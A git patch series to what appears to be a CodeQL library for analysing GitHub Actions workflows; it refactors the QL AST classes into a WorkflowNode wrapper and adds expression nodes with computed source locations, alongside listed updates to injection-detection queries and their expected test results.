@@ -61,7 +102,7 @@ class JobEnv extends Env { class StepEnv extends Env { Step step; - StepEnv() { step.(YamlMapping).lookup("env") = this } + StepEnv() { step.asYamlMapping().lookup("env") = this.asYamlNode() } /** Gets the step this field belongs to. */ Step getStep() { result = step } @@ -71,27 +112,32 @@ class StepEnv extends Env { * A custom composite action. This is a mapping at the top level of an Actions YAML action file. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. */ -class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { - //class CompositeAction extends AstNode, YamlDocument, YamlMapping { +class CompositeAction extends WorkflowNode { + //class CompositeAction extends WorkflowNode, YamlDocument, YamlMapping { CompositeAction() { - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - super.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + n instanceof YamlDocument and + n instanceof YamlMapping and + this.getLocation().getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = + "composite" } /** Gets the `runs` mapping. */ - Runs getRuns() { result = super.lookup("runs") } + Runs getRuns() { result.asYamlNode() = this.asYamlMapping().lookup("runs") } - Outputs getOutputs() { result = super.lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } - Input getAnInput() { super.lookup("inputs").(YamlMapping).maps(result, _) } + Input getAnInput() { + this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) + } Input getInput(string name) { - super.lookup("inputs").(YamlMapping).maps(result, _) and - result.(YamlString).getValue() = name + this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and + result.asYamlNode().(YamlString).getValue() = name } } @@ -99,34 +145,43 @@ class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { * An `runs` mapping in a custom composite action YAML. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs */ -class Runs extends AstNode instanceof YamlMapping { +class Runs extends WorkflowNode { CompositeAction action; - Runs() { action.(YamlMapping).lookup("runs") = this } + Runs() { + n instanceof YamlMapping and + action.asYamlMapping().lookup("runs") = this.asYamlNode() + } /** Gets the action that this `runs` mapping is in. */ CompositeAction getAction() { result = action } /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + Step getAStep() { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) + } /** Gets the step at the given index within this job. */ - Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } + Step getStep(int i) { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) + } } /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class Workflow extends AstNode instanceof YamlDocument, YamlMapping { +class Workflow extends WorkflowNode { + Workflow() { n instanceof YamlDocument and n instanceof YamlMapping } + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = super.lookup("jobs") } + YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result = super.lookup("env") } + WorkflowEnv getEnv() { result.asYamlNode() = this.asYamlMapping().lookup("env") } /** Gets the name of the workflow. */ - string getName() { result = super.lookup("name").(YamlString).getValue() } + string getName() { result = this.asYamlMapping().lookup("name").(YamlString).getValue() } /** Gets the job within this workflow with the given job ID. */ Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } @@ -135,107 +190,128 @@ class Workflow extends AstNode instanceof YamlDocument, YamlMapping { Job getAJob() { result = this.getJob(_) } predicate hasTriggerEvent(string trigger) { - exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(trigger)) + exists(YamlNode y | + y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(trigger) + ) } string getATriggerEvent() { - exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(result)) + exists(YamlNode y | y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(result)) } - Permissions getPermissions() { result = super.lookup("permissions") } + Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - Strategy getStrategy() { result = super.lookup("strategy") } + Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } } -class ReusableWorkflow extends Workflow instanceof YamlMapping { +class ReusableWorkflow extends Workflow { YamlValue workflow_call; ReusableWorkflow() { - super.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + n instanceof YamlMapping and + this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call } - Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } - Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + Input getAnInput() { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) + } Input getInput(string name) { - workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and - result.(YamlString).getValue() = name + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and + result.asYamlNode().(YamlString).getValue() = name } } -class Input extends AstNode { +class Input extends WorkflowNode { YamlMapping parent; - Input() { parent.lookup("inputs").(YamlMapping).maps(this, _) } + Input() { parent.lookup("inputs").(YamlMapping).maps(this.asYamlNode(), _) } } -class Outputs extends AstNode instanceof YamlMapping { +class Outputs extends WorkflowNode { YamlMapping parent; - Outputs() { parent.lookup("outputs") = this } + Outputs() { + n instanceof YamlMapping and + parent.lookup("outputs") = this.asYamlNode() + } /** * Gets an output expression. */ StringLiteral getAnOutput() { - super.lookup(_).(YamlMapping).lookup("value") = result or - super.lookup(_) = result + this.asYamlMapping().lookup(_).(YamlMapping).lookup("value") = result.asYamlNode() or + this.asYamlMapping().lookup(_) = result.asYamlNode() } /** * Gets a specific output expression by name. */ StringLiteral getOutput(string name) { - super.lookup(name).(YamlMapping).lookup("value") = result or - super.lookup(name) = result + this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = result.asYamlNode() or + this.asYamlMapping().lookup(name) = result.asYamlNode() } - string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } + string getAnOutputName() { + this.asYamlMapping().maps(any(YamlString s | s.getValue() = result), _) + } override string toString() { result = "Job outputs node" } } -class Permissions extends AstNode instanceof YamlMapping { +class Permissions extends WorkflowNode { YamlMapping parent; - Permissions() { parent.lookup("permissions") = this } + Permissions() { + n instanceof YamlMapping and + parent.lookup("permissions") = this.asYamlNode() + } } -class Strategy extends AstNode instanceof YamlMapping { +class Strategy extends WorkflowNode { YamlMapping parent; - Strategy() { parent.lookup("strategy") = this } + Strategy() { + n instanceof YamlMapping and + parent.lookup("strategy") = this.asYamlNode() + } /** * Gets a specific matric expression (YamlMapping) by name. */ StringLiteral getMatrixVar(string name) { - super.lookup("matrix").(YamlMapping).lookup(name) = result + this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() } /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getAMatrixVar() { super.lookup("matrix").(YamlMapping).lookup(_) = result } + StringLiteral getAMatrixVar() { + this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() + } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends AstNode instanceof YamlMappingLikeNode { +class Needs extends WorkflowNode { Job job; - Needs() { job.(YamlMapping).lookup("needs") = this } + Needs() { + n instanceof YamlMappingLikeNode and + job.asYamlMapping().lookup("needs") = this.asYamlNode() + } Job getJob() { result = job } Job getANeededJob() { - result.getId() = super.getNode(_).(YamlString).getValue() and + result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and result.getLocation().getFile() = job.getLocation().getFile() // if this instanceof YamlString // then @@ -254,11 +330,14 @@ class Needs extends AstNode instanceof YamlMappingLikeNode { * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. */ -class Job extends AstNode instanceof YamlMapping { +class Job extends WorkflowNode { string jobId; Workflow workflow; - Job() { this = workflow.getJobs().lookup(jobId) } + Job() { + n instanceof YamlMapping and + this.asYamlNode() = workflow.getJobs().lookup(jobId) + } /** * Gets the ID of this job, as a string. @@ -267,10 +346,14 @@ class Job extends AstNode instanceof YamlMapping { string getId() { result = jobId } /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + Step getAStep() { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) + } /** Gets the step at the given index within this job. */ - Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } + Step getStep(int i) { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) + } /** Gets the workflow this job belongs to. */ Workflow getWorkflow() { result = workflow } @@ -293,7 +376,7 @@ class Job extends AstNode instanceof YamlMapping { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - Outputs getOutputs() { result = super.lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } @@ -310,14 +393,14 @@ class Job extends AstNode instanceof YamlMapping { UsesJob getUses() { result.getJob() = this } predicate usesReusableWorkflow() { - this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) + this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) } - If getIf() { result = super.lookup("if") } + If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } - Permissions getPermissions() { result = super.lookup("permissions") } + Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - Strategy getStrategy() { result = super.lookup("strategy") } + Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } override string toString() { result = "Job: " + jobId } } @@ -326,41 +409,41 @@ class Job extends AstNode instanceof YamlMapping { * A step within an Actions job. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. */ -class Step extends AstNode instanceof YamlMapping { +class Step extends WorkflowNode { YamlMapping parent; - Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this } + Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this.asYamlNode() } /** Gets the ID of this step, if any. */ - string getId() { result = super.lookup("id").(YamlString).getValue() } + string getId() { result = this.asYamlMapping().lookup("id").(YamlString).getValue() } /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ - Job getJob() { result = parent } + Job getJob() { result.asYamlNode() = parent } /** Gets the value of the `if` field in this step, if any. */ - If getIf() { result = super.lookup("if") } + If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } } /** * An If node representing a conditional statement. */ -class If extends AstNode { - YamlMapping parent; +class If extends WorkflowNode { + WorkflowNode parent; If() { (parent instanceof Step or parent instanceof Job) and - parent.lookup("if") = this + parent.asYamlMapping().lookup("if") = this.asYamlNode() } - AstNode getEnclosingNode() { result = parent } + WorkflowNode getEnclosingNode() { result = parent } - string getCondition() { result = this.(YamlScalar).getValue() } + string getCondition() { result = this.asYamlNode().(YamlScalar).getValue() } } /** * Abstract class representing a call to a 3rd party action or reusable workflow. */ -abstract class Uses extends AstNode { +abstract class Uses extends WorkflowNode { abstract string getCallee(); abstract string getVersion(); @@ -385,7 +468,7 @@ private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } class UsesStep extends Step, Uses { YamlScalar uses; - UsesStep() { this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = "uses"), uses) } + UsesStep() { this.asYamlMapping().maps(any(YamlScalar s | s.getValue() = "uses"), uses) } /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { @@ -400,7 +483,7 @@ class UsesStep extends Step, Uses { override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } override StringLiteral getArgument(string key) { - result = this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) + result.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) } override string toString() { @@ -411,8 +494,11 @@ class UsesStep extends Step, Uses { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class UsesJob extends Uses instanceof YamlMapping { - UsesJob() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } +class UsesJob extends Uses { + UsesJob() { + this instanceof Job and + this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) + } Job getJob() { result = this } @@ -428,7 +514,7 @@ class UsesJob extends Uses instanceof YamlMapping { override string getCallee() { exists(YamlString name | - super.lookup("uses") = name and + this.asYamlMapping().lookup("uses") = name and if name.getValue().matches("./%") then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else @@ -442,7 +528,7 @@ class UsesJob extends Uses instanceof YamlMapping { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | - super.lookup("uses") = name and + this.asYamlMapping().lookup("uses") = name and if not name.getValue().matches("\\.%") then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() @@ -450,7 +536,7 @@ class UsesJob extends Uses instanceof YamlMapping { } override StringLiteral getArgument(string key) { - super.lookup("with").(YamlMapping).lookup(key) = result + this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = result.asYamlNode() } } @@ -461,7 +547,7 @@ class UsesJob extends Uses instanceof YamlMapping { class Run extends Step { StringLiteral script; - Run() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "run"), script) } + Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) } StringLiteral getScript() { result = script } @@ -473,18 +559,19 @@ class Run extends Step { /** * A YamlString part of a YamlSequence or YamlMapping values. */ -class StringLiteral extends AstNode instanceof YamlString { +class StringLiteral extends WorkflowNode { StringLiteral() { + n instanceof YamlString and exists(YamlCollection c | c instanceof YamlMapping and - c.(YamlMapping).maps(_, this) + c.(YamlMapping).maps(_, this.asYamlNode()) or c instanceof YamlSequence and - c.(YamlSequence).getElementNode(_) = this + c.(YamlSequence).getElementNode(_) = this.asYamlNode() ) } - string getValue() { result = this.(YamlString).getValue() } + string getValue() { result = this.asYamlNode().(YamlString).getValue() } } /** @@ -508,7 +595,7 @@ string getASimpleReferenceExpression(YamlString node) { class Expression extends StringLiteral { string expr; - Expression() { expr = getASimpleReferenceExpression(this) } + Expression() { expr = getASimpleReferenceExpression(this.asYamlNode()) } string getExpression() { result = expr } @@ -529,7 +616,7 @@ class ContextExpression extends Expression { abstract string getFieldName(); - abstract AstNode getTarget(); + abstract WorkflowNode getTarget(); } private string stepsCtxRegex() { @@ -574,7 +661,7 @@ class StepsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { this.getLocation().getFile() = result.getLocation().getFile() and result.(Step).getId() = stepId } @@ -601,7 +688,7 @@ class NeedsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { neededJob.getLocation().getFile() = this.getLocation().getFile() and this.getJob().getANeededJob() = neededJob and ( @@ -631,7 +718,7 @@ class JobsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { exists(Job job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and @@ -655,7 +742,7 @@ class InputsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { result.getLocation().getFile() = this.getLocation().getFile() and ( exists(ReusableWorkflow w | w.getInput(fieldName) = result) @@ -680,8 +767,8 @@ class EnvExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { - exists(AstNode s | + override WorkflowNode getTarget() { + exists(WorkflowNode s | s.getEnvVar(fieldName) = result and s.getAChildNode*() = this ) @@ -703,7 +790,7 @@ class MatrixExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { exists(Workflow w | w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this From 96246f4b74cd050d2f9b919e9aadf7f626de6041 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 7 Mar 2024 15:35:47 +0100 Subject: [PATCH 087/707] Add Expression nodes and their corresponding locations --- .gitignore | 1 + ql/lib/codeql/Locations.qll | 59 ++- ql/lib/codeql/actions/Ast.qll | 353 ++++++++----- ql/lib/codeql/actions/ast/internal/Yaml.qll | 9 +- .../actions/controlflow/internal/Cfg.qll | 27 +- .../codeql/actions/dataflow/ExternalFlow.qll | 10 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 12 +- .../dataflow/internal/DataFlowPublic.qll | 4 +- ...el.yml => actions_github-script.model.yml} | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/CompositeActionsSources.ql | 2 +- .../CWE-020/CompositeActionsSummaries.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSources.ql | 2 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 2 +- .../CWE-094/CriticalExpressionInjection.ql | 5 +- .../Security/CWE-094/ExpressionInjection.ql | 5 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 3 +- .../.github/workflows/expression_nodes.yml | 22 + ql/test/library-tests/test.expected | 250 ++++++++- ql/test/library-tests/test.ql | 8 +- .../CWE-020/CompositeActionsSinks.expected | 18 +- .../CWE-020/CompositeActionsSources.expected | 12 +- .../CompositeActionsSummaries.expected | 12 +- .../CWE-020/ReusableWorkflowsSinks.expected | 6 +- .../CWE-020/ReusableWorkflowsSources.expected | 12 +- .../ReusableWorkflowsSummaries.expected | 18 +- .../.github/workflows/comment_issue.yml | 4 +- .../workflows/comment_issue_newline.yml | 4 +- .../CriticalExpressionInjection.expected | 463 ++++++++--------- .../CWE-094/ExpressionInjection.expected | 480 +++++++++--------- 32 files changed, 1113 insertions(+), 702 deletions(-) rename ql/lib/ext/{PLACEHOLDER.model.yml => actions_github-script.model.yml} (57%) create mode 100644 ql/test/library-tests/.github/workflows/expression_nodes.yml diff --git a/.gitignore b/.gitignore index 6c0e5c58738d..1127e8f55db1 100644 --- a/.gitignore +++ b/.gitignore @@ -3,3 +3,4 @@ ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ +db/ diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll index 3a16bdec40d2..33a8eba30acb 100644 --- a/ql/lib/codeql/Locations.qll +++ b/ql/lib/codeql/Locations.qll @@ -1,6 +1,7 @@ /** Provides classes for working with locations. */ import files.FileSystem +import codeql.actions.Ast bindingset[loc] pragma[inline_late] @@ -11,30 +12,57 @@ private string locationToString(Location loc) { ) } +newtype TLocation = + TBaseLocation(string filepath, int startline, int startcolumn, int endline, int endcolumn) { + exists(File file | + file.getAbsolutePath() = filepath and + locations_default(_, file, startline, startcolumn, endline, endcolumn) + ) + or + exists(ExpressionNode e | + e.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + ) + or + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } + /** * A location as given by a file, a start line, a start column, * an end line, and an end column. * * For more information about locations see [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). */ -class Location extends @location_default { +class Location extends TLocation, TBaseLocation { + string filepath; + int startline; + int startcolumn; + int endline; + int endcolumn; + + Location() { this = TBaseLocation(filepath, startline, startcolumn, endline, endcolumn) } + /** Gets the file for this location. */ - File getFile() { locations_default(this, result, _, _, _, _) } + File getFile() { + exists(File file | + file.getAbsolutePath() = filepath and + result = file + ) + } /** Gets the 1-based line number (inclusive) where this location starts. */ - int getStartLine() { locations_default(this, _, result, _, _, _) } + int getStartLine() { result = startline } /** Gets the 1-based column number (inclusive) where this location starts. */ - int getStartColumn() { locations_default(this, _, _, result, _, _) } + int getStartColumn() { result = startcolumn } - /** Gets the 1-based line number (inclusive) where this location ends. */ - int getEndLine() { locations_default(this, _, _, _, result, _) } + /** Gets the 1-based line number (inclusive) where this.getLocationDefault() location ends. */ + int getEndLine() { result = endline } - /** Gets the 1-based column number (inclusive) where this location ends. */ - int getEndColumn() { locations_default(this, _, _, _, _, result) } + /** Gets the 1-based column number (inclusive) where this.getLocationDefault() location ends. */ + int getEndColumn() { result = endcolumn } /** Gets the number of lines covered by this location. */ - int getNumLines() { result = this.getEndLine() - this.getStartLine() + 1 } + int getNumLines() { result = endline - startline + 1 } /** Gets a textual representation of this element. */ pragma[inline] @@ -47,13 +75,12 @@ class Location extends @location_default { * For more information, see * [Providing locations in CodeQL queries](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). */ - predicate hasLocationInfo( - string filepath, int startline, int startcolumn, int endline, int endcolumn - ) { - exists(File f | - locations_default(this, f, startline, startcolumn, endline, endcolumn) and - filepath = f.getAbsolutePath() - ) + predicate hasLocationInfo(string p, int sl, int sc, int el, int ec) { + p = filepath and + sl = startline and + sc = startcolumn and + el = endline and + ec = endcolumn } /** Holds if this location starts strictly before the specified location. */ diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1d86d81a063e..21d4f052e130 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -3,7 +3,9 @@ private import codeql.Locations newtype TAstNode = TWorflowNode(YamlNode n) or - TExpressionNode() + TExpressionNode(StringValue n, string expression, int exprOffset) { + expression = getASimpleReferenceExpression(n, exprOffset) + } class AstNode extends TAstNode { abstract AstNode getAChildNode(); @@ -12,21 +14,160 @@ class AstNode extends TAstNode { abstract string getAPrimaryQlClass(); + abstract string toString(); + abstract Location getLocation(); - abstract string toString(); + abstract File getFile(); + + /** + * Gets the enclosing workflow statement. + */ + Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + ExpressionNode getInScopeEnvVarExpr(string name) { + exists(StringValue l, Env env | + env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), l.asYamlNode()) and + l.getAnExpression() = result + | + env.(StepEnv).getStep().getAChildNode*() = this + or + env.(JobEnv).getJob().getAChildNode*() = this + or + env.(WorkflowEnv).getWorkflow().getAChildNode*() = this + ) + } } class ExpressionNode extends AstNode, TExpressionNode { - override string toString() { result = "expression node" } + StringValue n; + string rawExpression; + string expression; + int exprOffset; + + ExpressionNode() { + this = TExpressionNode(n, rawExpression, exprOffset - 1) and + expression = + rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + } + + override string toString() { result = expression } override AstNode getAChildNode() { none() } - override AstNode getParentNode() { none() } + override AstNode getParentNode() { result = n } override string getAPrimaryQlClass() { result = "ExpressionNode" } - override Location getLocation() { none() } + string getExpression() { result = expression } + + string getRawExpression() { result = rawExpression } + + Job getJob() { result.getAChildNode*() = n } + + int lineLength(int idx) { + exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) + } + + bindingset[i] + int unboundPartialLineLengthSum(int i) { + result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) + } + + int partialLineLengthSum(int i) { + i in [0 .. count(n.getValue().splitAt("\n"))] and + result = this.unboundPartialLineLengthSum(i) + } + + predicate expressionOffsets(int sl, int sc, int el, int ec) { + exists(int lineDiff, string style, Location loc | + loc = n.asYamlNode().getLocation() and + lineDiff = loc.getEndLine() - loc.getStartLine() and + style = n.asYamlNode().(YamlString).getStyle() + | + // eg: + // - run: echo "hello" + // - run: 'echo "hello"' + // - run: "echo 'hello'" + style = ["", "\"", "'"] and + lineDiff = 0 and + sl = loc.getStartLine() and + el = sl and + sc = loc.getStartColumn() + exprOffset and + ec = sc + rawExpression.length() - 1 + or + // eg: + // - run: "echo 'hello' + // echo 'hello'" + // - run: "echo 'hello' + // echo 'hello' + // echo 'hello'" + style = ["", "\"", "'"] and + lineDiff > 0 and + sl = loc.getStartLine() and + el = loc.getEndLine() and + sc = loc.getStartColumn() and + ec = loc.getEndColumn() + or + // eg: + // - run: | + // echo "hello" + // - run: | + // echo "hello" + // echo "bye" + style = "|" and + exists(int r | + ( + r > 0 and + this.partialLineLengthSum(r - 1) < exprOffset and + this.partialLineLengthSum(r) >= exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = + n.getKeyNode().getLocation().getStartColumn() + exprOffset - + this.partialLineLengthSum(r - 1) + 2 - 1 and + ec = sc + rawExpression.length() - 1 + or + r = 0 and + this.partialLineLengthSum(r) > exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = n.getKeyNode().getLocation().getStartColumn() + 2 + exprOffset and + ec = sc + rawExpression.length() - 1 + ) + ) + or + // eg: + // - run: > + // echo "hello" + // - run: > + // echo "hello" + // echo "hello" + style = ">" and + sl = loc.getStartLine() + 1 and + el = loc.getEndLine() and + sc = n.getKeyNode().getLocation().getStartColumn() and + ec = loc.getEndColumn() + ) + } + + override Location getLocation() { + exists(Location loc | + this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), + loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and + result = loc + ) + } + + predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { + path = n.asYamlNode().getFile().getAbsolutePath() and + this.expressionOffsets(sl, sc, el, ec) + } + + override File getFile() { result = n.asYamlNode().getFile() } } /** @@ -39,37 +180,23 @@ class WorkflowNode extends AstNode, TWorflowNode { override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) } - override AstNode getAChildNode() { result = TWorflowNode(n.getAChildNode()) } + override AstNode getAChildNode() { + result = TWorflowNode(n.getAChildNode()) + or + exists(ExpressionNode e | e.getParentNode() = this | result = e) + } override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() } override Location getLocation() { result = n.getLocation() } - override string toString() { result = n.toString() } - - /** - * Gets the enclosing workflow statement. - */ - Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - StringLiteral getEnvVar(string name) { - exists(Env env | - env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), result.asYamlNode()) - | - env.(StepEnv).getStep().getAChildNode*() = this - or - env.(JobEnv).getJob().getAChildNode*() = this - or - env.(WorkflowEnv).getWorkflow().getAChildNode*() = this - ) - } + override File getFile() { result = n.getFile() } YamlNode asYamlNode() { result = n } YamlMapping asYamlMapping() { result = n } + + override string toString() { result = n.toString() } } /** A common class for `env` in workflow, job or step. */ @@ -117,7 +244,7 @@ class CompositeAction extends WorkflowNode { CompositeAction() { n instanceof YamlDocument and n instanceof YamlMapping and - this.getLocation().getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" } @@ -127,9 +254,9 @@ class CompositeAction extends WorkflowNode { Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } Input getAnInput() { this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) @@ -214,9 +341,9 @@ class ReusableWorkflow extends Workflow { Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) @@ -245,17 +372,19 @@ class Outputs extends WorkflowNode { /** * Gets an output expression. */ - StringLiteral getAnOutput() { - this.asYamlMapping().lookup(_).(YamlMapping).lookup("value") = result.asYamlNode() or - this.asYamlMapping().lookup(_) = result.asYamlNode() - } + ExpressionNode getAnOutputExpr() { result = this.getOutputExpr(_) } /** * Gets a specific output expression by name. */ - StringLiteral getOutput(string name) { - this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = result.asYamlNode() or - this.asYamlMapping().lookup(name) = result.asYamlNode() + ExpressionNode getOutputExpr(string name) { + exists(StringValue l | + l.getAnExpression() = result and + ( + this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = l.asYamlNode() or + this.asYamlMapping().lookup(name) = l.asYamlNode() + ) + ) 